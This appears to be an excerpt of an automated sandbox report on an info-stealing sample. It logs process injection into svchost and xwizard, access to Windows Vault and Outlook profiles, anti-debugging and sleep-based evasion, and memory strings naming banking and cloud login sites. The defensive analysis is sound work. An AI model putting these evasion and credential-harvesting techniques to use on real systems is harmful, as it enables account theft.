                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 1YDqrpKZwA.exeStatic file information: File size 1174016 > 1048576
                Source: 1YDqrpKZwA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 1YDqrpKZwA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 1YDqrpKZwA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 1YDqrpKZwA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 1YDqrpKZwA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 1YDqrpKZwA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 1YDqrpKZwA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: 1YDqrpKZwA.exe, 00000000.00000003.1243246434.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 1YDqrpKZwA.exe, 00000000.00000003.1244863700.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1368148034.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1463815847.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1370146590.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1463815847.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000009.00000003.1463897442.0000000004BD0000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000003.1466273036.0000000004D8B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090312107.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090312107.00000000050DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1YDqrpKZwA.exe, 00000000.00000003.1243246434.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 1YDqrpKZwA.exe, 00000000.00000003.1244863700.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1368148034.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1463815847.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1370146590.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1463815847.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, xwizard.exe, 00000009.00000003.1463897442.0000000004BD0000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000003.1466273036.0000000004D8B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090312107.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090312107.00000000050DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: xwizard.pdb source: svchost.exe, 00000002.00000003.1432166999.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1431590021.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432310020.0000000003027000.00000004.00000020.00020000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000003.1401218035.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000002.3089405152.00000000009B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: xwizard.exe, 00000009.00000002.3089303575.0000000003346000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.000000000556C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000000.1531793198.0000000002EEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1761265485.0000000027BFC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: xwizard.exe, 00000009.00000002.3089303575.0000000003346000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.000000000556C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000000.1531793198.0000000002EEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1761265485.0000000027BFC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000002.00000003.1432166999.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1431590021.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432310020.0000000003027000.00000004.00000020.00020000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000003.1401218035.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000002.3089405152.00000000009B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bIMhSmtZ.exe, 00000008.00000002.3089837312.0000000000EAF000.00000002.00000001.01000000.00000005.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3089420407.0000000000EAF000.00000002.00000001.01000000.00000005.sdmp
                Source: 1YDqrpKZwA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 1YDqrpKZwA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 1YDqrpKZwA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 1YDqrpKZwA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 1YDqrpKZwA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006AC304 LoadLibraryA,GetProcAddress,0_2_006AC304
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0063C590 push eax; retn 0063h0_2_0063C599
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00658B85 push ecx; ret 0_2_00658B98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405967 push ds; ret 2_2_00405968
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EC22 push edi; ret 2_2_0041EC26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004124BE push ss; iretd 2_2_004124BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403550 push eax; ret 2_2_00403552
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417566 push ebp; ret 2_2_00417572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404D7A push es; iretd 2_2_00404D7B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BD16 push cs; ret 2_2_0040BD22
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040C588 push cs; iretd 2_2_0040C592
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AE17 push es; ret 2_2_0041AE18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360225F pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036027FA pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360283D push eax; iretd 2_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360135F push eax; iretd 2_2_03601369
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032B7345 push 0000005Eh; retf 8_2_032B7354
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032B7B5D push ds; retf 8_2_032B7BB7
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032A7215 push ds; ret 8_2_032A7216
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032A6628 push es; iretd 8_2_032A6629
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032ADE36 push cs; iretd 8_2_032ADE40
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032B8E14 push ebp; ret 8_2_032B8E20
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032BC6C5 push es; ret 8_2_032BC6C6
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032B3D6C push ss; iretd 8_2_032B3D6D
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032AD5C4 push cs; ret 8_2_032AD5D0
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeCode function: 8_2_032C04D0 push edi; ret 8_2_032C04D4
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F427FA pushad ; ret 9_2_04F427F9
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F4225F pushad ; ret 9_2_04F427F9
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F4283D push eax; iretd 9_2_04F42858
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F709AD push ecx; mov dword ptr [esp], ecx9_2_04F709B6
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_04F41366 push eax; iretd 9_2_04F41369
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00634A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00634A35
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006B55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_006B55FD
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006533C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006533C7
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeAPI/Special instruction interceptor: Address: 34B3214
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF9105CD324
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF9105CD7E4
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF9105CD944
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF9105CD504
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF9105CD544
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF9105CD1E4
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF9105D0154
                Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FF9105CDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100381
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeAPI coverage: 4.9 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\xwizard.exeAPI coverage: 3.1 %
                Source: C:\Windows\SysWOW64\xwizard.exe TID: 2960Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exe TID: 2960Thread sleep time: -88000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exe TID: 2016Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exe TID: 2016Thread sleep time: -37500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exe TID: 2016Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00694696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00694696
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069C93C FindFirstFileW,FindClose,0_2_0069C93C
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0069C9C7
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0069F200
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0069F35D
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0069F65E
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00693A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00693A2B
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00693D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00693D4E
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0069BF27
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CCC580 FindFirstFileW,FindNextFileW,FindClose,9_2_00CCC580
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00634AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00634AFE
                Source: 64604151.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 64604151.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 64604151.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 64604151.9.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 64604151.9.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 64604151.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 64604151.9.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 64604151.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 64604151.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 64604151.9.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 64604151.9.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: 64604151.9.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: 64604151.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: xwizard.exe, 00000009.00000002.3089303575.0000000003346000.00000004.00000020.00020000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3089641467.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.1762732398.00000248A7BBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 64604151.9.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 64604151.9.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 64604151.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 64604151.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 64604151.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 64604151.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 64604151.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 64604151.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 64604151.9.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 64604151.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 64604151.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 64604151.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 64604151.9.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 64604151.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 64604151.9.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 64604151.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 64604151.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 64604151.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A73 LdrLoadDll,2_2_00417A73
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006A41FD BlockInput,0_2_006A41FD
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00633B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00633B4C
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00665CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00665CCC
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006AC304 LoadLibraryA,GetProcAddress,0_2_006AC304
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_034B34E0 mov eax, dword ptr fs:[00000030h]0_2_034B34E0
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_034B3480 mov eax, dword ptr fs:[00000030h]0_2_034B3480
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_034B1E70 mov eax, dword ptr fs:[00000030h]0_2_034B1E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]2_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
